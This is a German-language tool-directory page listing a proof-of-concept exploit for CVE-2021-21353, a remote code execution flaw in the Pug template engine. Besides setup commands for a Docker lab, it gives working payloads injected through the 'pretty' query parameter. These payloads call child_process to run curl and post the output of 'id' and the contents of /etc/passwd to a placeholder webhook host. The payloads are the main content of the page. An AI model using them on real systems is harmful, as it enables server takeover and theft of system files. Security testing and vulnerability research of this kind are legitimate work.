Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PUG-RCE-CVE-2021-21353-POC — Proof-of-concept-Exploit für CVE-2021-21353, eine Schwachstelle zur Remote-Code-Ausführung in Pug Template Engine Versionen <=3.0.0. Demonstriert Payload-Injection über den 'pretty' Parameter, um beliebige Befehle auszuführen. | Kitploit
Tools/GitHubGitHub/jinsu9758/pug-rce-cve-2021-21353-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubjinsu9758/pug-rce-cve-2021-21353-poc

PUG-RCE-CVE-2021-21353-POC

Proof-of-concept-Exploit für CVE-2021-21353, eine Schwachstelle zur Remote-Code-Ausführung in Pug Template Engine Versionen <=3.0.0. Demonstriert Payload-Injection über den 'pretty' Parameter, um beliebige Befehle auszuführen.

Repository anzeigen
25vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PUG-RCE (CVE-2021-21353) POC

Informationen zur Schwachstelle

CVE-Nummer : cve-2021-21353
CVSS-Score : 8.1

< Anfällige Versionen >
pug_version <= 3.0.0
2.0.3 < pug-code-gen version, 3.0.0<= pug-code-gen version < 3.0.2


Einrichtung

git clone https://github.com/jinsu9758/PUG-RCE-CVE-2021-21353-POC.git
cd PUG-RCE-CVE-2021-21353-POC
sudo docker compose up

※ Zugriff über Port 3000 möglich


Payload

Payload-Test
?pretty=');console.log('executed');//

Finaler Payload
?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(id)\" <webhook_site>');_=('

?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(cat /etc/passwd)\" <webhook_site>');_=('

Tool herunterladen